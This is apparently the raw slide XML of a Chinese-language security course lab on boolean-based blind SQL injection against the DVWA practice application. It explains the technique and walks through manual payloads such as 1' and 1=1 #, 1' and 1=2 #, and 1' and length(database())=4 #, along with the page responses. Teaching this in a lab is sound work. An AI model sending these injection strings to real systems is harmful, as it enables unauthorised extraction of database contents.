                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：返回字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>码值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="240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775419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966479" y="837929"/>
            <a:ext cx="2925802" cy="474140"/>
            <a:chOff x="4966479" y="837929"/>
            <a:chExt cx="2925802"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4966479" y="837929"/>
              <a:ext cx="2925802"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基于布尔的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SQL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盲注</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="1672109"/>
            <a:ext cx="11161240" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对于一个注入点，页面只返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>两种类型页面，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>此时可以利用基于布尔的盲注。布尔盲注就是通过判断语句来猜解，如果判断条件正确则页面显示正常，否则报错，这样一轮一轮猜下去直到猜对，是挺麻烦但是相对简单的盲注方式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197FFAF6-64D3-46AB-A604-47726C0E19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5119" y="3504248"/>
            <a:ext cx="5086350" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323381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3177945" y="837929"/>
            <a:ext cx="6502870" cy="474140"/>
            <a:chOff x="3177945" y="837929"/>
            <a:chExt cx="6502870"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3177945" y="837929"/>
              <a:ext cx="6502870"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实验七：</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DVWA</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中的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SQL Injection(Blind)</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实践</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="1672109"/>
            <a:ext cx="11161240" cy="1892826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>接下来，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中提供的注入案例，进行手工盲注，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目标是推测出数据库、表和字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>啊？”，通过这种机械的询问，最终获得你想要的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="3675887"/>
            <a:ext cx="10932750" cy="1053622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第一步：判断是否存在注入，注入是字符型还是数字型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，显示相应用户存在：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102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8975" y="4761584"/>
            <a:ext cx="7139862" cy="2094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0390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3" presetClass="entr" presetSubtype="10"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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="18"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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="820611"/>
            <a:ext cx="11161240" cy="969496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and 1=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，单引号为了闭合原来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语句中的第一个单引号，而后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为了闭合后面的单引号。运行后，显示存在：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="3976365"/>
            <a:ext cx="10932750" cy="581057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and 1=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3"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8975" y="1929130"/>
            <a:ext cx="7272808" cy="2119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829" y="4696445"/>
            <a:ext cx="7856642" cy="15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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3981103" y="6198295"/>
            <a:ext cx="5328592" cy="576248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>字符型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7941543" y="1790107"/>
            <a:ext cx="4464496" cy="1898226"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79769"/>
              <a:gd name="adj2" fmla="val 38804"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>试试？好像也行，原因？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>对数值型字段输入的如果有非字符，有默认处理，只提取前面有效数字使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>所以，也可以利用这一点来判断是否是数值型还是字符型的注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970933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3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="with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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102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0" grpId="0"/>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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="303957"/>
            <a:ext cx="11161240" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>点页面右下角</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>View Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，来查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205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6967" y="738220"/>
            <a:ext cx="7488832" cy="6494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6433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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10"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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="736005"/>
            <a:ext cx="11161240" cy="2815322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二步：猜解当前数据库名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and length(database())=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and length(database())=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and length(database())=3 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and length(database())=4 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示存在：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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4959" y="3797530"/>
